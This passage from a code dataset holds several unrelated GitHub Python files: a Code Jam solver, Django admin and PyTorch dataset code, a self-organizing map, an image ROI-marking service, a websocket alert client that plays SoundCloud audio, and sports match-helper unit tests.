xrange(len(path)-1,-1,-1):\n if navail[j]:\n if city in flights[path[j]]:\n break\n else:\n navail[j]=False\n navail.append(True)\n x=solve(path+[city],navail)\n if x is not None:\n return x\n #failure\n return None\n \n\nt=int(sys.stdin.readline())\nfor caseno in xrange(t):\n lin=sys.stdin.readline().split()\n n=int(lin[0])\n m=int(lin[1])\n zipcodes=[]\n reachable=[]\n for j in xrange(n):\n zip=sys.stdin.readline().strip()\n zipcodes.append(zip)\n reachable.append((zip,j+1))\n reachable.sort()\n flights={}\n for j in xrange(n):\n flights[j+1]=[]\n for j in xrange(m):\n lin=sys.stdin.readline().split()\n i=int(lin[0])\n j=int(lin[1])\n flights[i].append(j)\n flights[j].append(i)\n #try each starting city\n for zip,city in reachable:\n x=solve([city],[True])\n if x is not None:\n #solved\n res=\"\"\n for city in x:\n res+=zipcodes[city-1]\n sys.stdout.write(\"Case #\"+repr(caseno+1)+\": \"+res+\"\\n\")\n break\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/14/23/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"2983139274","text":"from django.contrib import admin\n\nfrom home.models import message\n\n# Register your models here.\n@admin.register(message)\nclass messageAdmin(admin.ModelAdmin):\n list_display = (\"name\", \"message\", \"contact\", \"email\")\n list_filter = (\"contact\",)\n search_fields = [\"name\"]","repo_name":"suyogojha/BulkMsg_token","sub_path":"home/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"23476898810","text":"import torch.utils.data as data\n\nfrom PIL import Image\nimport numpy as np\nimport random\n\nimport os\nimport os.path\n\n\ndef has_file_allowed_extension(filename, extensions):\n \"\"\"Checks if a file is an allowed extension.\n\n Args:\n filename (string): path to a file\n\n Returns:\n bool: True if the filename ends with a known image extension\n \"\"\"\n filename_lower = filename.lower()\n return any(filename_lower.endswith(ext) for ext in extensions)\n\n\ndef find_classes(dir):\n classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]\n classes.sort()\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, 
class_to_idx\n\n\ndef make_dataset(dir, class_to_idx, ages, extensions):\n persons = []\n dir = os.path.expanduser(dir)\n for target in sorted(os.listdir(dir)):\n d = os.path.join(dir, target)\n if not os.path.isdir(d):\n continue\n\n for root, _, fnames in sorted(os.walk(d)):\n person = []\n for fname in sorted(fnames):\n if has_file_allowed_extension(fname, extensions):\n path = os.path.join(root, fname)\n age = int(fname.split('_')[-1].split('.')[0])\n item = (path, age_to_class(age, ages))\n person.append(item)\n\n persons.append(person)\n\n return persons\n\ndef age_to_class(age, ages):\n for i, _age in enumerate(ages):\n if age <= _age:\n return i\n return len(ages)\n\nIMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']\n\n\ndef pil_loader(path):\n # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert('RGB')\n\n\ndef accimage_loader(path):\n import accimage\n try:\n return accimage.Image(path)\n except IOError:\n # Potentially a decoding problem, fall back to PIL.Image\n return pil_loader(path)\n\n\ndef default_loader(path):\n from torchvision import get_image_backend\n if get_image_backend() == 'accimage':\n return accimage_loader(path)\n else:\n return pil_loader(path)\n\nclass AgePairDataFolder(data.Dataset):\n\n def __init__(self, root, ages=[10, 18, 30, 40, 50, 60], loader=default_loader, extensions=IMG_EXTENSIONS, transform=None, target_transform=None):\n self.ages = ages\n persons, person_to_idx = find_classes(root)\n samples = make_dataset(root, person_to_idx, ages, extensions)\n if len(samples) == 0:\n raise(RuntimeError(\"Found 0 files in subfolders of: \" + root + \"\\n\"\n \"Supported extensions are: \" + \",\".join(extensions)))\n\n self.root = root\n self.loader = loader\n self.extensions = extensions\n\n self.samples = samples\n\n self.transform = transform\n self.target_transform = target_transform\n\n def get_p_example(self, person):\n index = random.randrange(len(person))\n path, target = person[index]\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return (sample, target)\n\n def get_n_example(self, person):\n index = random.randrange(len(person))\n path, target = person[index]\n target = (target + random.randrange(1, len(self.ages)+1)) % (len(self.ages)+1)\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return (sample, target)\n\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n personA = self.samples[index]\n _index = (index + random.randrange(1, len(self.samples))) % len(self.samples)\n personB = self.samples[_index]\n pExample1, pExample2 = self.get_p_example(personA), self.get_p_example(personA)\n nExample1, nExample2 = self.get_p_example(personA), self.get_p_example(personB)\n\n return pExample1[0], pExample2[0], pExample1[1], pExample2[1], nExample1[0], nExample2[0], nExample1[1], nExample2[1]\n\n def __len__(self):\n return len(self.samples)\n\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: 
{}\\n'.format(self.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str","repo_name":"mathfinder/CODE_X","sub_path":"source/datasets/agepairdatafolder.py","file_name":"agepairdatafolder.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2395756166","text":"import os\nimport time\nimport json\nimport jsonpickle\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom src.dataentity import DataEntity\nfrom src.learningasset import LearningAsset\nfrom src.neuron import Neuron\nimport jsonpickle.ext.numpy as jsonpickle_numpy\njsonpickle_numpy.register_handlers()\n\n\nclass SomNetwork(object):\n\n def __init__(self, dataset):\n self.neurons_w_num = dataset.params_num\n self.__network_size(dataset.elements_num)\n self.__neurons_num(dataset.elements_num)\n self.__initialize_input(dataset)\n self.__initalize_output()\n self.winner_coordinates = None\n self.result = None\n # adaptation parameters\n self.sigma_0 = self.network_size - 4\n self.gamma_0 = 1\n self.alfa = 4000\n self.mcolor = np.array([[255, 255, 0], [255, 0, 0], [0, 255, 0], [0, 0, 255]])\n self.population_of_ids = [i for i in range(0, len(self.input))]\n\n def test_fun(self):\n pass\n\n def __str__(self):\n text = 'Network map:\\n'\n for i in range(0, self.network_size):\n for j in range(0, self.network_size):\n text += '({},{}): {} | '.format(i+1, j+1, self.output[i][j])\n text += '\\n'\n\n return text\n\n def get_params_bandwidth(self):\n p = np.array([])\n for item in self.input:\n p = np.append(p, item.params)\n p = p.reshape((len(self.input), self.neurons_w_num))\n l_bound = p.min(axis=0)\n u_bound = p.max(axis=0)\n print(u_bound - l_bound)\n return u_bound - l_bound\n\n def __network_size(self, n):\n \"\"\" returns dimension (N) for the network map (N x N)\n :param n: number of input vectors - dataset records\n \"\"\"\n # self.network_size = int(np.ceil(np.sqrt(5 * np.sqrt(n))))\n self.network_size = 12\n\n def __neurons_num(self, n):\n \"\"\" number of total neurons in the SOM map\n :param n: number of input vectors - dataset records\n \"\"\"\n d = np.ceil(np.sqrt(5 * np.sqrt(n)))\n # self.neurons_num = int(d * d)\n self.neurons_num = 144\n\n def __initialize_input(self, dataset):\n \"\"\" draws only elements from dataset\n :param dataset: instance of LearningAsset class holding data records\n \"\"\"\n self.input = []\n for i in range(0, dataset.elements_num):\n self.input.append(dataset.elements[i])\n\n def __initalize_output(self, fromfile=True):\n \"\"\" builds SOM map of neurons \"\"\"\n # self.read_network_map()\n # self.__show_output(result)\n # self.test_fun()\n # self.read_network_map()\n # print('initialize output')\n\n self.output = np.array([])\n # numpy array of max_i - min_i for every i-parameter\n bandwidth = self.get_params_bandwidth()\n for i in range(0, self.neurons_num):\n self.output = np.append(self.output, Neuron(self.neurons_w_num, bandwidth))\n self.output = np.reshape(self.output, (self.network_size, self.network_size))\n\n # noinspection PyTypeChecker\n def euclidean(self, X, Y):\n \"\"\" Euclidean norm for two numpy.ndarrays X and Y \"\"\"\n return np.sqrt(np.sum((X - Y) ** 2))\n\n def get_norms(self, v):\n norms = []\n self.output = 
self.output.reshape((1, self.neurons_num))\n        for neuron in self.output[0]:\n            norms.append(self.euclidean(neuron.weights, v))\n        self.output = self.output.reshape((self.network_size, self.network_size))\n        return np.array(norms).reshape((self.network_size, self.network_size))\n\n    def distance_to_champion(self, n, c, metric):\n        if metric == 'taxicab':\n            return np.sum(np.abs(n - c))\n        else:\n            return np.sqrt(np.sum((n - c) ** 2))\n\n    def learn(self):\n        # # adaptation parameters\n        # sigma_0 = self.network_size - 4\n        # gamma_0 = 1\n        # alfa = 4000\n        # mcolor = np.array([[255, 255, 0], [255, 0, 0], [0, 255, 0], [0, 0, 255]])\n        #\n        # population_of_ids = [i for i in range(0, len(self.input))]\n        # rand_ids = random.sample([i for i in range(0, len(self.input))], len(self.input))\n        for k in range(0, 10):\n            k3 = self.one_step_learn(k, self.sigma_0, self.gamma_0, self.alfa, self.mcolor, self.population_of_ids)\n            k4 = k3.reshape((self.network_size, self.network_size, 3))\n            # time.sleep(0.2)\n        return k4\n\n    def one_step_learn(self, k, sigma_0, gamma_0, alfa, mcolor, population_of_ids):\n        k3 = np.array([])\n        id = random.choice(population_of_ids)\n        # those parameters change after every k iteration\n        # at first step k == 0 so gamma_0 and sigma_0 are considered valid at first\n        gamma = gamma_0 * np.exp(-k / alfa)\n        sigma = sigma_0 * np.exp(-k / alfa)\n        d = self.input[id]\n        # print(self.input[id])\n\n        # matrix of euclidean norms between neuron weights and input data for every neuron\n        norms = self.get_norms(d.params)\n        location_of_min = np.argmin(norms)\n\n        # compute (i, j) coordinates of the minimum value in the norms matrix\n        # (unravel the flat argmin index using the map width)\n        self.winner_coordinates = np.array([location_of_min // self.network_size, location_of_min % self.network_size])\n        # print(k, self.winner_coordinates)\n        print('inside: ', k)\n        # step over neighbourhood and update\n        for i in range(0, self.network_size):\n            for j in range(0, self.network_size):\n                neighbour = np.array([i, j])\n                dn = self.distance_to_champion(neighbour, self.winner_coordinates, 'euclidean')\n                if dn < sigma:\n                    # update neighbours weights\n                    delta = np.exp((- dn ** 2) / (2 * (sigma ** 2)))\n                    self.output[i][j].weights += delta * gamma * (d.params - self.output[i][j].weights)\n                    pass\n                k1 = np.dot(self.output[i][j].weights, mcolor)\n                # k2 = np.sum(k1, axis=1)\n                k3 = np.append(k3, k1)\n        k4 = k3.reshape((self.network_size, self.network_size, 3))\n        self.result = k4\n        return k4\n\n\nif __name__ == '__main__':\n    data = LearningAsset()\n    data.loadAsset('../data/IrisDataAll.csv')\n    # print(data)\n    network = SomNetwork(data)\n    # print(network.output)\n    # network.save_network_map()\n    # print('\\nSOM map data was dumped into data/map.json.\\n')\n    # network.read_network_map()\n    # print('\\nSOM map data was read from data/map.json.\\n')\n\n    # im = network.learn()\n    # plt.figure()\n    # plt.imshow(im)\n    # plt.show()\n    # print(network)\n\n    # mcolor = np.array([[255,255,0],[255,0,0],[0,255,0],[0,0,255]])\n    # k3 = np.array([])\n    # for i in range(0, network.network_size):\n    #     for j in range(0, network.network_size):\n    #         k1 = np.dot(network.output[i][j].weights, mcolor)\n    #         # k2 = np.sum(k1, axis=1)\n    #         k3 = np.append(k3, k1)\n    # k4 = k3.reshape((network.network_size, network.network_size, 3))\n    # # plt.imshow(k4, interpolation='nearest')\n    # plt.imshow(k4)\n    # plt.show()\n\n    # print(network)\n    # norms = network.get_norms(network.input[0].params)\n    # print(norms)\n    # m = np.max(norms)\n    # print(m)\n    # print(network.output.shape)\n    # idx = np.argmax(norms)\n    # network.winner_coordinates = [int(idx/8), idx%8]\n    # print(idx)\n    # print('x 
- ',idx%8)\n    # print('y - ',int(idx/8))\n\n\n\n","repo_name":"airpawel/SOM","sub_path":"src/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"23359203421","text":"# -*- coding: utf-8 -*-\n# Trimmed down from the [DeepMosaic project](https://github.com/HypoX64/DeepMosaics)\n# Uses the project's pretrained models to mark the ROI regions of an image\nimport os\nimport sys\nimport imghdr\n\nimport cv2\nimport torch\nimport numpy as np\nimport zerorpc\n\nfrom dm_models import runmodel\nfrom dm_models.BiSeNet_model import BiSeNet\n\nnetF = BiSeNet(num_classes=1, context_path='resnet18',train_flag=False)\nnetX = BiSeNet(num_classes=1, context_path='resnet18',train_flag=False)\nnetF.load_state_dict(torch.load(os.path.join(os.environ['IMAGESERVICE_ROOT'], 'models', 'pretrained_models', 'add_face.pth')))\nnetX.load_state_dict(torch.load(os.path.join(os.environ['IMAGESERVICE_ROOT'], 'models', 'pretrained_models', 'add_youknow.pth')))\nnetF.eval()\nnetX.eval()\n# do not use the GPU\n# netF.cuda()\n# netX.cuda()\n\nclass Opt(object):\n    \"\"\"Default parameters from DeepMosaics\"\"\"\n    def __init__(self):\n        self.mask_extend = 10\n        self.mask_threshold = 64\n        self.mosaic_mod = 'squa_avg'\n        self.mosaic_size = 0\n\nclass DeepMosaics_ROIMarker(object):\n    def roi_marker(self, image_data, roi_type='face'):\n        opt = Opt()\n        image_type = imghdr.what(None, image_data)\n        img = cv2.imdecode(np.frombuffer(image_data, np.uint8), cv2.IMREAD_COLOR)\n        if roi_type == 'face':\n            netS = netF\n        else:\n            netS = netX\n        mask, (x,y,w,h)= runmodel.get_ROI_position(img, netS, opt)\n        # cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 2)\n        # in OpenCV 4, findContours returns two values\n        contours, hierarchy = cv2.findContours(mask,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) \n        img = cv2.drawContours(img,contours,-1,(0,255,0),3) \n        is_success, im_buf_arr = cv2.imencode(\".\"+image_type, img)\n        byte_im = im_buf_arr.tobytes()\n        return byte_im\n\n\nif __name__ == \"__main__\":\n    s = zerorpc.Server(DeepMosaics_ROIMarker())\n    s.bind(\"tcp://0.0.0.0:54334\")\n    s.run()\n","repo_name":"linxiaohui/image-service","sub_path":"ROI-Mark/roi_marker.py","file_name":"roi_marker.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"}
{"seq_id":"8321046163","text":"from websocket import create_connection\nfrom tkinter import *\nimport json\nimport sys\n\nif (len(sys.argv) < 2):\n    exit()\n\nclass Fullscreen_Window:\n\n    def __init__(self):\n        self.tk = Tk()\n        self.tk.attributes('-zoomed', True)  # This just maximizes it so we can see the window. 
It's nothing to do with fullscreen.\n        self.frame = Frame(self.tk)\n        self.frame.pack()\n        self.state = False\n        self.tk.bind(\"<F11>\", self.toggle_fullscreen)\n        self.tk.bind(\"<Escape>\", self.end_fullscreen)\n\n    def toggle_fullscreen(self, event=None):\n        self.state = not self.state  # Just toggling the boolean\n        self.tk.attributes(\"-fullscreen\", self.state)\n        return \"break\"\n\n    def end_fullscreen(self, event=None):\n        self.state = False\n        self.tk.attributes(\"-fullscreen\", False)\n        return \"break\"\n\ndef dostuff(msg):\n    print(msg)\n    msg = json.loads(msg)\n    title = msg[\"title\"]\n    body = msg[\"body\"]\n\n    w = Fullscreen_Window()\n    w.tk['bg'] = 'red'\n    # w.toggle_fullscreen()\n\n    l = Label(w.tk, text=\"Incoming Bomb Schedule!!!\", font=(\"Comic Sans\", 30), background=\"red\").pack(fill=\"none\")\n    # l.grid(row=0, column=0, padx=(100, 10))\n    # l.pack()\n    l = Label(w.tk, text=title, font=(\"Comic Sans\", 30), background=\"red\").pack(fill=\"none\")\n    l = Label(w.tk, text=body, font=(\"Comic Sans\", 30), background=\"red\").pack()\n    Button(w.tk, text=\"⊂(▀¯▀⊂)\", command=w.tk.destroy, font=(\"Comic Sans\", 30)).pack()\n\n    import soundcloud\n    from urllib.request import urlopen\n\n    # create a client object with your app credentials\n    client = soundcloud.Client(client_id=\"8a60af37f3a99161bca375510b1ebe55\")\n\n    # fetch track to stream\n    # track = client.get('/tracks/293')\n\n    # find all sounds of buskers licensed under 'creative commons share alike'\n    # tracks = client.get('/tracks', q='A meeting in the office')\n    tracks = client.get('/tracks', q=title)\n\n    print(tracks[0].title)\n\n    # get the tracks streaming URL\n    stream_url = client.get(tracks[0].stream_url, allow_redirects=False)\n\n    # print the tracks stream URL\n    print(stream_url.location)\n\n    # u = urlopen(stream_url.location)\n\n    import vlc\n    from vlc import State\n    p = vlc.MediaPlayer(stream_url.location)\n    p.play()\n    # while not p.get_state() == 5:\n    #     pass\n\n    w.tk.mainloop()\n    p.stop()\n    print(\"Tk exited\")\n\nws = create_connection(\"ws://139.59.162.84:40111\")\nprint(\"Connected\")\nws.send(\"LGN\" + sys.argv[1])\nprint(\"Logged in\")\nwhile(True):\n    mess = ws.recv()\n    print(mess)\n    if mess[:3] == \"ALR\":\n        dostuff(mess[3:])\n\n\n# dostuff(\"This is the message\")\n# dostuff(\"apple pie\")\n\n# dostuff(\"{\\\"title\\\": \\\"Apples\\\", \\\"body\\\": \\\"fiji\\\"}\")\n# dostuff(\"{\\\"title\\\": \\\"Apples\\\", \\\"body\\\": \\\"fiji\\\"}\")\n","repo_name":"AnthonyWharton/BombScheduling","sub_path":"clientapps/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"10483822388","text":"import csv\nimport datetime\nimport json\nimport random\n\nimport pytest\nfrom google.appengine.ext import ndb\n\nfrom backend.common.consts.alliance_color import AllianceColor\nfrom backend.common.consts.comp_level import CompLevel\nfrom backend.common.consts.event_type import EventType\nfrom backend.common.consts.playoff_type import DoubleElimRound, LegacyDoubleElimBracket\nfrom backend.common.helpers.match_helper import MatchHelper\nfrom backend.common.models.event import Event\nfrom backend.common.models.match import Match\n\n\n@pytest.fixture(autouse=True)\ndef auto_add_ndb_context(ndb_context) -> None:\n    pass\n\n\ndef test_natural_sorted_matches(test_data_importer) -> None:\n    matches = test_data_importer.parse_match_list(\n        __file__, \"data/2019nyny_matches.json\"\n    )\n\n    random.shuffle(matches)\n    matches = 
MatchHelper.natural_sorted_matches(matches)\n # Spot check - f, qf, qm, sf. Matches in comp level should be in order\n spot_check_indexes = [0, 1, 2, 3, 4, 13, 14, 90, 91, 92]\n spot_check_match_keys = [matches[i].key_name for i in spot_check_indexes]\n expected_match_keys = [\n \"2019nyny_f1m1\",\n \"2019nyny_f1m2\",\n \"2019nyny_qf1m1\",\n \"2019nyny_qf1m2\",\n \"2019nyny_qf2m1\",\n \"2019nyny_qm1\",\n \"2019nyny_qm2\",\n \"2019nyny_sf1m1\",\n \"2019nyny_sf1m2\",\n \"2019nyny_sf2m1\",\n ]\n assert spot_check_match_keys == expected_match_keys\n\n\ndef test_organized_matches_counts(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n\n count, organized_matches = MatchHelper.organized_matches(matches)\n assert count == 94\n assert len(organized_matches[CompLevel.QM]) == 77\n assert len(organized_matches[CompLevel.QF]) == 11\n assert len(organized_matches[CompLevel.EF]) == 0\n assert len(organized_matches[CompLevel.SF]) == 4\n assert len(organized_matches[CompLevel.F]) == 2\n\n\ndef test_organized_matches_sorted(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n\n _, organized_matches = MatchHelper.organized_matches(matches)\n quals = organized_matches[CompLevel.QM]\n quarters = organized_matches[CompLevel.QF]\n assert all(\n quals[i].match_number <= quals[i + 1].match_number\n for i in range(len(quals) - 1)\n )\n assert all(\n quarters[i].set_number <= quarters[i + 1].set_number\n for i in range(len(quarters) - 1)\n )\n\n\ndef test_organized_legacy_double_elim_matches(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2017wiwi_matches.json\"\n )\n\n _, organized_matches = MatchHelper.organized_matches(matches)\n double_elim_matches = MatchHelper.organized_legacy_double_elim_matches(\n organized_matches\n )\n\n assert LegacyDoubleElimBracket.WINNER in double_elim_matches\n assert LegacyDoubleElimBracket.LOSER in double_elim_matches\n\n assert all(\n level in double_elim_matches[LegacyDoubleElimBracket.WINNER]\n for level in [CompLevel.EF, CompLevel.QF, CompLevel.SF, CompLevel.F]\n )\n assert all(\n level in double_elim_matches[LegacyDoubleElimBracket.LOSER]\n for level in [CompLevel.EF, CompLevel.QF, CompLevel.SF, CompLevel.F]\n )\n\n bracket_to_match_keys = {\n bracket: {\n comp_level: [m.short_key for m in matches]\n for comp_level, matches in bracket_matches.items()\n }\n for bracket, bracket_matches in double_elim_matches.items()\n }\n assert bracket_to_match_keys[LegacyDoubleElimBracket.WINNER][CompLevel.EF] == [\n \"ef1m1\",\n \"ef2m1\",\n \"ef3m1\",\n \"ef4m1\",\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.WINNER][CompLevel.QF] == [\n \"qf1m1\",\n \"qf2m1\",\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.WINNER][CompLevel.SF] == [\n \"sf1m1\"\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.WINNER][CompLevel.F] == [\n \"f2m1\",\n \"f2m2\",\n ]\n\n assert bracket_to_match_keys[LegacyDoubleElimBracket.LOSER][CompLevel.EF] == [\n \"ef5m1\",\n \"ef6m1\",\n \"ef6m2\",\n \"ef6m3\",\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.LOSER][CompLevel.QF] == [\n \"qf3m1\",\n \"qf4m1\",\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.LOSER][CompLevel.SF] == [\n \"sf2m1\"\n ]\n assert bracket_to_match_keys[LegacyDoubleElimBracket.LOSER][CompLevel.F] == [\"f1m1\"]\n\n\ndef test_organized_double_elim_matches_pre_2023(test_data_importer) -> None:\n 
matches = test_data_importer.parse_match_list(\n __file__, \"data/2022cctest_matches.json\"\n )\n\n _, organized_matches = MatchHelper.organized_matches(matches)\n double_elim_matches = MatchHelper.organized_double_elim_matches(\n organized_matches, 2022\n )\n\n assert len(double_elim_matches) == len(DoubleElimRound)\n for round in DoubleElimRound:\n assert round in double_elim_matches\n\n round_to_match_keys = {\n round: [m.short_key for m in matches]\n for round, matches in double_elim_matches.items()\n }\n assert round_to_match_keys[DoubleElimRound.ROUND1] == [\n \"ef1m1\",\n \"ef2m1\",\n \"ef3m1\",\n \"ef4m1\",\n ]\n assert round_to_match_keys[DoubleElimRound.ROUND2] == [\n \"ef5m1\",\n \"ef6m1\",\n \"qf1m1\",\n \"qf2m1\",\n ]\n assert round_to_match_keys[DoubleElimRound.ROUND3] == [\"qf3m1\", \"qf4m1\"]\n assert round_to_match_keys[DoubleElimRound.ROUND4] == [\"sf1m1\", \"sf2m1\"]\n assert round_to_match_keys[DoubleElimRound.ROUND5] == [\"f1m1\"]\n assert round_to_match_keys[DoubleElimRound.FINALS] == [\"f2m1\", \"f2m2\", \"f2m3\"]\n\n\ndef test_organized_double_elim_4_matches(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2023micmp_matches.json\"\n )\n\n _, organized_matches = MatchHelper.organized_matches(matches)\n double_elim_matches = MatchHelper.organized_double_elim_4_matches(organized_matches)\n\n assert len(double_elim_matches) == 4\n\n round_to_match_keys = {\n round: [m.short_key for m in matches]\n for round, matches in double_elim_matches.items()\n }\n assert round_to_match_keys[DoubleElimRound.ROUND1] == [\"sf1m1\", \"sf2m1\"]\n assert round_to_match_keys[DoubleElimRound.ROUND2] == [\"sf3m1\", \"sf4m1\"]\n assert round_to_match_keys[DoubleElimRound.ROUND3] == [\"sf5m1\"]\n assert round_to_match_keys[DoubleElimRound.FINALS] == [\"f1m1\", \"f1m2\"]\n\n\ndef test_play_order_sort(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n sorted_matches = MatchHelper.play_order_sorted_matches(matches)\n assert len(sorted_matches) == 94\n assert all(\n sorted_matches[i].play_order <= sorted_matches[i + 1].play_order\n for i in range(len(sorted_matches) - 1)\n )\n\n\ndef test_recent_matches(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n quals = [m for m in matches if m.comp_level == CompLevel.QM]\n for m in quals:\n if m.match_number > 70:\n m.alliances[AllianceColor.RED][\"score\"] = -1\n m.alliances[AllianceColor.BLUE][\"score\"] = -1\n m.alliances_json = json.dumps(m.alliances)\n m._alliances = None\n\n recent_matches = MatchHelper.recent_matches(quals, num=3)\n assert [m.key_name for m in recent_matches] == [\n \"2019nyny_qm68\",\n \"2019nyny_qm69\",\n \"2019nyny_qm70\",\n ]\n\n\ndef test_recent_matches_none_played(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n quals = [m for m in matches if m.comp_level == CompLevel.QM]\n for m in quals:\n m.alliances[AllianceColor.RED][\"score\"] = -1\n m.alliances[AllianceColor.BLUE][\"score\"] = -1\n m.alliances_json = json.dumps(m.alliances)\n m._alliances = None\n\n recent_matches = MatchHelper.recent_matches(quals, num=3)\n assert recent_matches == []\n\n\ndef test_upcoming_matches(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n quals = [m for m in matches if m.comp_level == 
CompLevel.QM]\n for m in quals:\n if m.match_number > 70:\n m.alliances[AllianceColor.RED][\"score\"] = -1\n m.alliances[AllianceColor.BLUE][\"score\"] = -1\n m.alliances_json = json.dumps(m.alliances)\n m._alliances = None\n\n upcoming_matches = MatchHelper.upcoming_matches(quals, num=3)\n assert [m.key_name for m in upcoming_matches] == [\n \"2019nyny_qm71\",\n \"2019nyny_qm72\",\n \"2019nyny_qm73\",\n ]\n\n\ndef test_upcoming_matches_all_played(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n quals = [m for m in matches if m.comp_level == CompLevel.QM]\n\n upcoming_matches = MatchHelper.upcoming_matches(quals, num=3)\n assert upcoming_matches == []\n\n\ndef _parse_match_schedule_csv(event, filename):\n matches = []\n with open(filename) as f:\n reader = csv.DictReader((line.lower() for line in f), skipinitialspace=True)\n for row in reader:\n alliances = {}\n for alliance_color in (\"red\", \"blue\"):\n alliances[alliance_color] = {\n \"teams\": [\n \"frc\" + row[f\"{alliance_color} {i + 1}\"] for i in range(3)\n ],\n \"score\": row.get(f\"{alliance_color} score\", -1),\n }\n\n match = Match(\n event=event.key,\n id=Match.render_key_name(\n event.key_name,\n row[\"comp_level\"],\n row[\"set_number\"],\n row[\"match_number\"],\n ),\n comp_level=row[\"comp_level\"],\n set_number=int(row[\"set_number\"]),\n match_number=int(row[\"match_number\"]),\n alliances_json=json.dumps(alliances),\n time_string=row[\"time\"],\n )\n\n matches.append(match)\n\n return matches\n\n\ndef test_add_match_times(test_data_importer):\n event = Event(\n id=\"2014casj\",\n event_short=\"casj\",\n event_type_enum=EventType.REGIONAL,\n name=\"Silicon Valley Regional\",\n start_date=datetime.datetime(2014, 2, 27, 0, 0),\n end_date=datetime.datetime(2014, 3, 1, 0, 0),\n year=2014,\n timezone_id=\"America/New_York\",\n )\n\n matches = _parse_match_schedule_csv(\n event,\n test_data_importer._get_path(\n __file__, \"data/usfirst_event_matches_2013cama.csv\"\n ),\n )\n assert len(matches) == 92\n\n MatchHelper.add_match_times(event, matches)\n\n PST_DELTA = datetime.timedelta(hours=-5)\n assert matches[0].time == datetime.datetime(2014, 2, 28, 9, 0) - PST_DELTA\n assert matches[75].time == datetime.datetime(2014, 3, 1, 11, 50) - PST_DELTA\n\n\ndef test_add_match_times_dst(test_data_importer):\n event = Event(\n id=\"2014casj\",\n event_short=\"casj\",\n event_type_enum=EventType.REGIONAL,\n name=\"Silicon Valley Regional\",\n start_date=datetime.datetime(2014, 3, 8, 0, 0),\n end_date=datetime.datetime(2014, 3, 9, 0, 0), # chosen to span DST change\n year=2014,\n timezone_id=\"America/Los_Angeles\",\n )\n\n matches = _parse_match_schedule_csv(\n event,\n test_data_importer._get_path(__file__, \"data/usfirst_event_matches_2012ct.csv\"),\n )\n assert len(matches) == 125\n\n MatchHelper.add_match_times(event, matches)\n\n PST_DELTA = datetime.timedelta(hours=-8)\n PDT_DELTA = datetime.timedelta(hours=-7)\n assert matches[0].time == datetime.datetime(2014, 3, 8, 9, 0) - PST_DELTA\n assert matches[-1].time == datetime.datetime(2014, 3, 9, 16, 5) - PDT_DELTA\n\n\ndef test_add_match_times_with_weekdays(test_data_importer):\n event = Event(\n id=\"2023mibb\",\n event_short=\"mibb\",\n event_type_enum=EventType.OFFSEASON,\n name=\"Big Bang!\",\n start_date=datetime.datetime(2023, 6, 29, 0, 0),\n end_date=datetime.datetime(2023, 7, 1, 0, 0),\n year=2023,\n timezone_id=\"America/Detroit\",\n )\n\n matches = _parse_match_schedule_csv(\n event,\n 
